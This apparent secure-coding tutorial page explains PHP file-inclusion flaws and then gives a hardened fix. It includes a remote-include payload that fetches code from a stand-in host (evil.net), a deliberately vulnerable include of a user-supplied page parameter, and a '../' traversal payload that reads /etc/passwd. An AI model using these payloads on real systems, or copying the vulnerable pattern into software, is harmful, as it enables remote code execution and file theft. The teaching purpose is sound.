Variable Poisoning :: Chapter 2

[Past Exploits]
  1. ./?page=ftp://user:pass@evil.net/arbitrary_code.php
New Code
  // php.ini :: allow_url_fopen = Off
  // Disabling allow_url_fopen stops the remote (ftp://, http://) include from Chapter 1,
  // but file_exists() only checks that the file is there; it does not confine the
  // resolved path to $path, so "../" traversal still reaches any readable local file.
  $path = '/path/to/pages/';
  if (file_exists($path . $_GET['page'])) {
      include $path . $_GET['page'];
  }
Attack:
  1. ./?page=../../../../../../../etc/passwd
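A hardened replacement for the check above, added here as an example (it is not code from the original page); the pages directory and the allow-list of page names are assumed values:

```php
<?php
// Added example: allow-list the page name and confine the resolved path to the
// pages directory, so neither "../" traversal nor URL schemes reach include.
$pagesDir = realpath('/path/to/pages');        // assumed location, as on the page
$allowed  = ['home', 'about', 'contact'];       // constructed allow-list of page names

function resolve_page(string $pagesDir, array $allowed, string $page): ?string
{
    // Only plain names: no slashes, dots, or scheme prefixes can pass this pattern.
    if (!preg_match('/^[a-z0-9_-]+$/i', $page) || !in_array($page, $allowed, true)) {
        return null;
    }
    // The extension is appended server-side, so the caller never controls it.
    $candidate = realpath($pagesDir . '/' . $page . '.php');
    // realpath() collapses "../"; require the result to stay inside $pagesDir.
    $prefix = $pagesDir . DIRECTORY_SEPARATOR;
    if ($candidate === false || strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

$requested = $_GET['page'] ?? 'home';
$target    = resolve_page($pagesDir, $allowed, $requested);
if ($target === null) {
    // Log rejected names: repeated "../" or scheme prefixes here are a traversal signal.
    error_log('rejected page parameter: ' . substr($requested, 0, 100));
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```

With this in place the request `?page=../../../../../../../etc/passwd` fails the name pattern and is logged rather than included; the realpath prefix check is the second layer in case the allow-list is later loosened.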